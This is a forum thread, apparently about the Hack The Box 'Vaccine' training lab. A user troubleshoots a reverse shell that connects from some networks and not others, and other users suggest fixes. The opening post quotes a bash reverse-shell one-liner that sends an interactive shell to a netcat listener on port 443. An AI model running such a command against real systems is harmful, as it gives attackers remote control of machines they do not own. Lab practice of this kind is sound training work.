Starting point- vaccine

i have gotten to the point where i need to get a reverse shell.
i setup up a nc listner on port 443 on new terminal, and then entererd the bash command
(bash -c “bash -i >& /dev/tcp/{your_IP}/443 0>&1” ) with my ip.

but when i run the reverse shell it says no output and nc does not pick up anything?

ive ran into problems with reverse shells on some of the other starting point machines.
any help is greatly appreciated!!!

Creo q necesitas pasarlo por un | bash

Hello !
You have many other methods to try.
Have a look here
(maybe you should try another port that 443 also)

so i tried on another computer.
followed the same exact instructions and the reverse shell worked.

there must be some setting i need to change???

Ami me pasaba igual y revisando el codigo del pedf , tenia algo equivocado .
Compara los dos codigos del pdf capas alguna cosa pequeña esta equivocada ( “,’)

@D3W3Y it’s in Spanish but it says that you may have made a typo, try again on main computer now

on both computer i copied / pasted the commands from the pdf. only replacing my ip address which was the same on both. still only worked on one computer.

the computer its working on is my work laptop lol so i dont wanna use that one.

Lol try to connect both pc in your lan and see if it works

good idea . ill bring my laptop to work tomorrow . and bring my work laptop home to try it both was

If this work, maybe your problem is related to VPN.
What os do you use ?

im using windows 10 on all of my machines. i think i know its something with my laptop now.

i tried my personal laptop on my work’s network…didnt work.
i tried my work laptop on my home network …worked fine
tried my desktop on my home network…worked fine

problem is i want to use my personal laptop for everything HTB related.

Try to turn off AV firewall + windows firewall maybe

con otra maquina te sucedio igual o solo con la maquina [vacuna]?

it is happening on all machines.

@D3W3Y Did you try deactivating av + firewall ?

no not yet.
so i tried again today on my personal laptop at work . and it worked.
which confuses the ■■■■ out of me because i am copy & pasting the same commands and just replacing the session cookie and taget ip where needed.

So here are 2 things that I learned during my journey,
things will never work at first try and you suddenly make another copy paste that change everything and works. I assuming something change but I have no idea what
Asks gpt next time, he is very good for that.

ya its just crazy that this has been going on for months and then as soon as i change networks its fine.